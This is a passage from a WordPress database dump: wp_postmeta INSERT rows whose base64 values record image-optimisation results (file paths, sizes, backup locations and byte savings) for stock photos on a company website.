dGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG80NTA2NTI4LTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzQ1MDY1MjgtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkxNDMsImlkIjoyNDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNDUwNjUyOC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG80NTA2NTI4LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzQ1MDY1MjgtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkxNDUsImlkIjoyNDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNDUwNjUyOC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG80NTA2NTI4LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzQ1MDY1MjgtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkxNDgsImlkIjoyNDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNDUwNjUyOC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG80NTA2NTI4LTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzQ1MDY1MjgtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkxNTEsImlkIjoyNDJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvNDUwNjUyOC02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG80NTA2NTI4LTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzQ1MDY1MjgtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkxNTMsImlkIjoyNDJ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30303, 241, 'wpfc_optimisation_reduction', '162816'); 
INSERT INTO `wp_postmeta` VALUES (30304, 241, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi5qcGciLCJ3aWR0aCI6MzQ1NiwiaGVpZ2h0IjoyMzA0LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDIuanBnIiwicmVkdWN0aW9uIjoxNjI4MDIsInRpbWUiOjE0ODM1ODkxNjUsImlkIjoiMjQxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8zNTU5MzAyLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkxNjgsImlkIjoyNDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDItODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8zNTU5MzAyLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5MTcxLCJpZCI6MjQxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8zNTU5MzAyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDItNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTE3NCwiaWQiOjI0MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDItMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTE3OCwiaWQiOjI0MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8zNTU5MzAyLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkxODAsImlkIjoyNDF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8zNTU5MzAyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5MTgzLCJpZCI6MjQxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8zNTU5MzAyLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4OTE4NSwiaWQiOjI0MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8zNTU5MzAyLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkxODgsImlkIjoyNDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8zNTU5MzAyLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDItMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkxOTAsImlkIjoyNDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8zNTU5MzAyLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDItMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkxOTMsImlkIjoyNDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8zNTU5MzAyLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDItMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkxOTYsImlkIjoyNDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8zNTU5MzAyLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDItMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkxOTgsImlkIjoyNDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8zNTU5MzAyLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkyMDEsImlkIjoyNDF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMzU1OTMwMi02MDB4NjAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8zNTU5MzAyLTYwMHg2MDAuanBnIiwid2lkdGgiOiI2MDAiLCJoZWlnaHQiOiI2MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzM1NTkzMDItNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkyMDQsImlkIjoyNDF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30305, 240, 'wpfc_optimisation_reduction', '150196'); 
INSERT INTO `wp_postmeta` VALUES (30306, 240, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni5qcGciLCJ3aWR0aCI6MjAzMiwiaGVpZ2h0IjoyODY1LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYuanBnIiwicmVkdWN0aW9uIjoxNTAxODIsInRpbWUiOjE0ODM1ODkyMTQsImlkIjoiMjQwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNTE5OTc2LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkyMTcsImlkIjoyNDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYtNTY3eDgwMC5qcGciLCJ3aWR0aCI6NTY3LCJoZWlnaHQiOjgwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni01Njd4ODAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNTE5OTc2LTU2N3g4MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5MjIwLCJpZCI6MjQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNTE5OTc2LTc2OHgxMDgzLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6MTA4MywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni03Njh4MTA4My5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni03Njh4MTA4My5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkyMjQsImlkIjoyNDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYtMTEzNXgxNjAwLmpwZyIsIndpZHRoIjoxMTM1LCJoZWlnaHQiOjE2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYtMTEzNXgxNjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNTE5OTc2LTExMzV4MTYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODkyMjgsImlkIjoyNDB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzE1MTk5NzYtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMTUxOTk3Ni0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNTE5OTc2LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg5MjMwLCJpZCI6MjQwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8xNTE5OTc2LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWls